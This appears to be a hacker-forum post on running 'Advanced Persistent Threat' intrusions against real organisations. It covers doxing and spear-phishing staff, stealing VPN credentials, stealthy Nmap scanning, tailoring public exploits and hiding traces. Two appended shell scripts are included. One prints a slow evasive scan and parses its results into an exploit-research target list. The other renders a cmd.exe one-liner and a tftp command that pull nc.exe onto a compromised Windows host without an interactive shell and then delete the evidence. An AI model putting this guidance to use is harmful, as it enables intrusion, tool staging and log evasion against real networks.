Hi everybody, welcome to another high quality paper by me!
..::Introductions::..
So first, what are Advanced Persistent Threats? Without having to go Merriam-Webster on you, I suppose you could compare it to a professional pentest, except for real. Any possible vector, any small scrap of information, no matter how minuscule it looks in the grand scheme of things, can have a snowball effect and bring a torrential downfall on whoever the target may be.
I've seen a couple of APT attacks in the past year. For example, Stuxnet, U.S. Government contractor Lockheed-Martin, RSA, Oak Ridge National Lab, to name a few. Many big-name targets, all with major breaches of security (OK, maybe not Lockheed-Martin, but the others, oh yeah).
So what kind of vectors would we normally look at for compromising internal networks? Errbody knows you can't just Kool-Aid man yourself through a NAT'ed network, right?
..::Common Attack Vectors::..
Some things to consider attacking are:
1) The users, of course
   - DOX the fuck out of everyone important
   - E-mails / spear phishing / malware
   - Targeted corporate phishing, not lame-ass fake Facebook logins
   - Social engineering
2) Web servers, likely to be internal AND external
   - Some servers have database access to other servers in the LAN through a web interface that faces the internet
   - SharePoint services (these are mostly internal)

3) ***** VPN Credentials *****
   - EXTREMELY VALUABLE: one working set puts you on the inside of that NAT without firing a single exploit
   - WAY TOO OVERLOOKED AS FAR AS SECURITY IS CONCERNED
With Advanced Persistent Threats, there's really no set guide on how to do them. They are extremely information reliant, and situation specific. You really have to think outside of the box to be effective.
..::Thinking Outside The Box::..
For extremely sophisticated and specific attacks, you will need extremely sophisticated and specific information, as well as tools.
When the target has been chosen, the information gathering stage needs to be as meticulous and to the point as it can be. Every single detail, about every single service, about every single employee likely to have admin rights of any kind (host or network), needs to be obtained and documented.
1) Nmap scans
   - Need to include service scans (-sV) for TCP -AND- UDP ports
   - Need to be stealthy... none of that -T5 shit. -T1 may take forever, but it is far less likely to trip perimeter devices like firewalls and IDS/IPS. Keep in mind that timing only spreads your probes out, it doesn't hide them: a sensor that correlates per source address over days will still see the same SYNs and banner grabs.
   - NO VULNERABILITY SCANS. THAT IS WHAT SERVICE SCANS ARE FOR: you pull the versions, then research the vulnerabilities on your own computer, safely, instead of throwing noisy checks at the target.
2) Exploits
   - Many of the ones openly available on the internet are rigged for a specific IP, a specific OS version, or a useless payload (like popping calc.exe). These need to be reworked to suit your needs.
   - Opcodes, return addresses and offsets need to match the specific operating system version (and service pack) you are targeting; a stock exploit for the wrong build just crashes the service and gets you noticed.
   - NO REVERSE SHELLS ON EXTERNAL SERVERS. Bind shells are trickier to pull off and harder to clean up after, but a reverse shell leaves a record of an outbound connection to YOUR address in the server's logs and at the perimeter, which is VERY hard to erase, and it is STUPID to deliberately bring a reverse connection back to your home IP. Unless, of course, you break into someone's wifi, but be prepared to deal with suspicion if your skills are known.
3) 0-days are your best friends
   - Yes, they are hard to get hold of, and hard to create on your own, but with even one 0-day you can jump through a lot of hoops very quickly.

4) Pivot!!
   - If you don't know what pivoting is, I highly suggest you look into the Metasploit Unleashed class by Offensive Security.
   - It lets you attack other computers from a computer you have already compromised.
   - If you're too 1337 for Metasploit, at least take the time to upload some attack tools to the machine (non-interactive tools).

5) File transfers
   - Just about every computer can move files to another one. FTP is a TCP protocol, TFTP is UDP. FTP will most likely require an interactive command shell (the stock Windows ftp.exe client is interactive unless you feed it a command file with -s:), which is why TFTP is ba-ba-ba-ballin!!! tftp.exe is a one-shot command with no login, though on Vista and later it is an optional feature that may not be installed.
   - Take the time to find non-interactive ftp/tftp clients
   - Compromise an FTP server, or even set up your own secret one within the target LAN (especially effective for moving tools between internal machines)

..::Be a Ninja::..
The common theme with professional hackers: emulate it! Limit the amount of traffic you're putting out AND RECEIVING. Stuxnet took a long time to reach its target, but when it did it completely fucked shit up! Keep your ping packets to the smallest size possible. That's why we use the -T1 option for Nmap... because it's slow, and doesn't put out a lot of traffic all at once.
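Here is how the "slow service scan, research offline" part looks in practice. This is an added example of mine, not code from the original post: it prints (does not run) the low-and-slow Nmap line described above, and then turns Nmap's grepable output into a per-port inventory you can research from your own box. The hosts, ports and version strings in SAMPLE_GNMAP are constructed; nothing here touches a network.

```shell
#!/bin/sh
# Added example (not from the original post). All addresses and banners below
# are made up; this script never connects anywhere.

# The scan the post describes, printed rather than executed:
#   -sS/-sU  TCP SYN + UDP           -sV  service versions only, no NSE vuln scripts
#   -T1      one probe roughly every 15 seconds (slow, but not invisible)
#   -oG      grepable output so the triage below can run offline
scan_cmd() {
  printf 'nmap -sS -sU -sV -T1 --max-retries 2 -p T:21,22,80,443,445,3389,U:53,69,161,500 -oG scan.gnmap %s\n' "$1"
}

# Constructed sample of what -oG writes. Each Ports entry is
# port/state/proto/owner/service/rpcinfo/version/ and entries are comma separated.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated Tue Jan  9 03:12:01 2024 as: nmap -sS -sU -sV -T1 -oG scan.gnmap 10.0.0.5 10.0.0.9
Host: 10.0.0.5 ()  Status: Up
Host: 10.0.0.5 ()  Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 80/open/tcp//http//Apache httpd 2.4.54/, 161/open/udp//snmp//SNMPv1 server (public)/  Ignored State: closed (1)
Host: 10.0.0.9 ()  Status: Up
Host: 10.0.0.9 ()  Ports: 445/open/tcp//microsoft-ds//Windows Server 2008 R2 microsoft-ds/, 161/open|filtered/udp//snmp///  Ignored State: closed (2)
# Nmap done at Tue Jan  9 11:40:55 2024 -- 2 IP addresses (2 hosts up) scanned in 30534.11 seconds'

# Read grepable output on stdin, emit one "ip proto port service version" line
# per confirmed-open port. UDP open|filtered means "no answer", which is a
# guess rather than a finding, so it is dropped; research time goes to real banners.
inventory() {
  awk '
    /^Host:/ && /Ports:/ {
      ip = $2
      sub(/.*Ports: /, "")
      sub(/[ \t]+Ignored State:.*/, "")
      n = split($0, e, /, /)
      for (i = 1; i <= n; i++) {
        split(e[i], f, "/")
        if (f[2] != "open") continue
        ver = (f[7] == "") ? "-" : f[7]
        printf "%s %s %s %s %s\n", ip, f[3], f[1], f[5], ver
      }
    }'
}

# Usage on a real run: scan_cmd 10.0.0.0/24, run that line yourself, then
#   inventory < scan.gnmap > targets.txt
# and take targets.txt home. Here it is fed the constructed sample:
printf '%s\n' "$SAMPLE_GNMAP" | inventory
```

Every line in the inventory carries a product and version, which is exactly what you need to go digging for a matching exploit without sending another packet at the target. Note that -sV still has to talk to each open port to get those banners, so the service scan itself is visible; -T1 just keeps it from looking like a scan in any single five-minute window.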
Be patient. Advanced Persistent Threats are exactly that...Persistent. With that said, I believe I've covered a good amount here. There will be a video coming in the near future from me on a possible attack scenario you might see in an Advanced Persistent Threat. Expect some awesome stuff! Peace Out!
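Item 5 above (file transfers without an interactive shell) worked as an added example. This is my code, not the author's: it renders the command file that makes Windows ftp.exe non-interactive, the single cmd.exe line that builds and runs that file when all you have is one-command-at-a-time execution, the tftp.exe one-shot, and a hash to compare after the transfer. The staging host 10.0.0.50, the file name nc.exe and the credentials are placeholders; nothing here connects anywhere.

```shell
#!/bin/sh
# Added example, not from the original post. Host, file and credentials are
# placeholders; the script only prints what you would run on the target.

# ftp.exe is interactive, but `ftp -s:file` reads its commands from a file.
# Render that file: open, user, password, binary mode, fetch, quit.
ftp_script() {
  host="$1"; file="$2"; user="${3:-anonymous}"; pass="${4:-anon@}"
  printf 'open %s\n%s\n%s\nbinary\nget %s\nbye\n' "$host" "$user" "$pass" "$file"
}

# Same thing as one cmd.exe line. From a web shell or command injection you
# cannot type into ftp.exe, and you have no file on the box yet, so build the
# command file with echo, run it, delete it. `&` chains commands in cmd.exe;
# %TEMP% expands on the target.
ftp_oneliner() {
  host="$1"; file="$2"; user="${3:-anonymous}"; pass="${4:-anon@}"; t="${5:-%TEMP%\\f.txt}"
  printf 'echo open %s>%s&echo %s>>%s&echo %s>>%s&echo binary>>%s&echo get %s>>%s&echo bye>>%s&ftp -s:%s&del %s\n' \
    "$host" "$t" "$user" "$t" "$pass" "$t" "$t" "$file" "$t" "$t" "$t" "$t"
}

# tftp.exe: no login, no command file, one shot over UDP/69. -i = binary mode.
# On Vista and later the TFTP client is an optional feature, so check for it first.
tftp_cmd() {
  printf 'tftp -i %s GET %s\n' "$1" "$2"
}

# Hash the tool before staging it. After the transfer run
#   certutil -hashfile <file> SHA256
# on the Windows side and compare, so a truncated TFTP transfer does not leave
# you executing half a binary (TFTP has no integrity check of its own).
tool_hash() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Render everything for the hypothetical staging box:
ftp_script 10.0.0.50 nc.exe
ftp_oneliner 10.0.0.50 nc.exe
tftp_cmd 10.0.0.50 nc.exe
```

The one-liner is the piece people forget: you usually cannot drop the command file first, because dropping files is the problem you are trying to solve. Building it with a chain of echo redirects is what turns the interactive FTP client into something you can drive blind, and the del at the end is the cleanup the post keeps nagging about.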